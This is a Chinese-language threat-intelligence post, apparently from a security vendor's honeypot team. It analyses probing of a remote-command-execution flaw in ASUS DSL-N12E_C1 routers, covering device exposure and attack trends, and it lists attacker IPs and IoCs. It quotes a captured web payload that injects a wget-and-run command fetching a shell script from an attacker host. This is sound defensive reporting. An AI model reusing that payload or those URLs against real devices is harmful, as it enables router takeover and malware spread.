【格物猎踪】“磨刀霍霍”—ASUS DSL-N12E_C1 RCE漏洞正被探测

2020-08-10 13:38:43 浏览数 (1)

执行摘要

近期,我们在排查绿盟威胁捕获系统相关日志的过程中发现,自2020年2月27日起,针对ASUS DSL-N12E_C1 RCE漏洞[1]出现了探测、利用行为。本文将通过脆弱性、暴露情况以及威胁分析三个方面,分析本次捕获到的攻击。

脆弱性分析一节,我们结合互联网公开PoC及捕获到的攻击,分析了攻击手法。

暴露情况分析一节,我们发现2020年1月至2020年7月,互联网中暴露了33000台ASUS DSL-N12E_C1,大部分分布在巴西、澳大利亚和意大利。

威胁分析一节,我们分析了攻击次数和攻击源的分布,发现攻击次数和攻击源数量均没有出现爆发的情况,我们推测针对该漏洞的探测和利用还处于编写、测试EXP模块的阶段。

截至成稿,我们尚未发现针对该漏洞的利用有爆发的迹象,但也应引起各方注意,提前做好预防措施。

一、脆弱性分析

本次我们捕获到的攻击针对ASUS DSL-N12E_C1,漏洞细节参见EDB-ID:48315[1]。该漏洞存在于DSL-N12E_C1的Web服务中,触发RCE的PATH_INFO为:/Main_Analysis_Content.asp。通过向QUERY_STRING中的特定位置插入命令,仅需发送一条GET请求即可触发漏洞。

绿盟科技威胁捕获系统中,捕获到的恶意载荷如下所示:

POST

/Main_Analysis_Content.aspcurrent_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=group_id=&modified=0&action_mode= Refresh &action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget2.236.163.208/Sep.sh ; sh Sep.sh

可以看出,攻击者尝试自行拼接构成一个能够触发该RCE的HTTP请求,但截至截稿,其拼接的恶意载荷均不是完整的HTTP请求,我们认为其实际上无效,但不排除日后攻击者更新的可能。另外,其尝试触发漏洞的请求方式与ExploitDB公布的略有不同,ExploitDB中触发该漏洞的方法为GET,而攻击者请求的方法为POST。

二、 暴露情况分析

通过使用绿盟威胁情报中心对DSL-N12E_C1指纹进行搜索,共发现33000条记录(2020年1月至2020年7月),端口暴露情况分布如图 2.1 所示,从端口分布可以看出RTSP服务默认的554端口暴露最多,其余是常见WEB服务的端口,如7547,8080,80都是HTTP(s)的常用端口。另外,SIP、Telnet、SSH、FTP服务也存在一定的暴露。

图 2.1 暴露的ASUS DSL-N12E_C1开放端口(1000以上)情况(2020年1月至2020年7月)

暴露的ASUS DSL-N12E_C1国家分布(前十)情况如图 2.2 所示,可以看出巴西的暴露数量明显多于其他国家。另外,澳大利亚和意大利也存在超过3000台设备暴露。

图 2.2 暴露的ASUS DSL-N12E_C1国家分布(前十)情况(2020年1月至2020年7月)

三、威胁分析

3.1 攻击趋势

我们对2020年以来,该攻击的次数进行了统计,如图 3.1 所示。发现攻击最早出现在2020年2月27日,2020年3月-4月攻击相对活跃,2020年5月截至截稿,攻击相对平缓,且数量较少。攻击次数较少,说明并未针对该漏洞的利用,目前还处于编写、测试EXP模块的阶段,暂时没有出现爆发的情况,但也应引起注意,做好预防措施。

图 3.1 攻击次数变化趋势

最后,我们统计了攻击源数量变化,2020年1月至2020年7月,相同时间段攻击源数量始终在个位数之间波动,但攻击源的总数量超过了50个。结合较少的攻击次数,从侧面证明了我们的推测,攻击者目前使用了固定的主机测试该漏洞,尚未发动僵尸主机参与扫描。而攻击源总数超过20个则说明,针对该漏洞的攻击源交替活跃,并未出现在同一时段爆发的情况。截至2020年7月,虽然我们暂未发现针对本文所述漏洞的利用出现爆发的迹象,但不排除日后僵尸网络将本文所述漏洞加入武器库的可能性。

3.2典型攻击源分析

我们对捕获到的攻击源进行了分析,发现大部分攻击源还在不同程度地利用其他漏洞,攻击物联网设备。其中部分IP需要引起注意:

193.106.162.134,位于俄罗斯,该攻击源最早于2020年2月1日被我们捕获,出现漏洞探测行为,除对本文所述漏洞进行探测外,还探测了以下漏洞:

- CVE-2017-17215,漏洞利用详情参见EDB-ID:43414[[2]。

- MVPower DVR TV-7104HE 1.8.4 115215B9-Shell命令执行,漏洞利用详情参见EDB-ID:41471[3]。

93.71.247.71,位于意大利,该攻击源最早于2020年2月1日被我们捕获,出现漏洞探测行为,除对本文所述漏洞进行探测外,还探测了以下漏洞:

- CVE-2014-8361,漏洞利用详情参见EDB-ID:37169[4]。

- CVE-2017-17215,漏洞利用详情参见EDB-ID:43414。

- MVPower DVR TV-7104HE 1.8.4 115215B9-Shell命令执行,漏洞利用详情参见EDB-ID:41471。

3.3IoC

部分样本源文件名与SHA256

文件名

sha256

richard

27495c6334048dd8f30a8334e141af6937ea08c83138aeaec3df2ce42edd64d9

URLS

http://80.82.67.184/richard

192.236.163.208/Sep.sh

参考文献

[1] Exploit DB.ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution. https://www.exploit-db.com/exploits/45135.

[2] ExploitDB. Huawei Router HG532 - Arbitrary Command Execution. https://www.exploit-db.com/exploits/43414.

[3] Exploit DB. MVPower DVR TV-7104HE 1.8.4115215B9 - Shell Command Execution (Metasploit). https://www.exploit-db.com/exploits/41471. https://www.exploit-db.com/exploits/41471.

[4] Exploit DB. Realtek SDK - Miniigd UPnP SOAPCommand Execution (Metasploit). https://www.exploit-db.com/exploits/37169

0 人点赞